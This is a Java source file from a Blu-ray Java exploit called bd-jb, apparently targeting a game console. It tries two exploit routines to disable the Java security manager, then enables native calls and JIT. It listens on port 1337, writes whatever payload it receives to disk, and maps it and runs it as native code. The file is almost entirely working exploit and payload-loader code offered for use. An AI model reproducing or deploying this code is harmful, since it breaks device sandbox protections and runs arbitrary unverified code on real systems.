/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */

package com.bdjb;

import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;

class Exploit implements Runnable {
  static void init() {
    Screen.println("[+] bd-jb by theflow");

    Screen.println("[*] Disabling security manager...");

    ExploitInterface[] exploits =
        new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};

    for (int i = 0; i < exploits.length; i++) {
      try {
        exploits[i].trigger();
        if (System.getSecurityManager() == null) {
          break;
        }
      } catch (Exception e) {
        continue;
      }
    }

    if (System.getSecurityManager() != null) {
      Screen.println("[-] Error could not disable security manager.");
    }
  }

  static void start() {
    new Thread(new Exploit()).start();
  }

  public void run() {
    if (System.getSecurityManager() != null) {
      return;
    }

    try {
      Screen.println("[*] Installing native API...");
      API api = API.getInstance();

      Screen.println("[*] Enabling JIT...");
      JIT jit = JIT.getInstance();

      Screen.println(
          "[*] Listening for payload on "
              + InetAddress.getLocalHost().getHostAddress()
              + ":1337...");

      ServerSocket serverSocket = new ServerSocket(1337);
      Socket socket = serverSocket.accept();

      Screen.println("[*] Downloading payload...");

      InputStream inputStream = socket.getInputStream();
      OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");

      byte[] buf = new byte[8192];
      int read;
      while ((read = inputStream.read(buf)) > 0) {
        outputStream.write(buf, 0, read);
      }

      outputStream.close();
      inputStream.close();

      socket.close();

      Screen.println("[*] Executing payload...");
      long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin");
      int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
      Screen.println("[+] Result: " + ret);
    } catch (Exception e) {
      Screen.println("[-] Error: " + e.getMessage());
    }
  }
}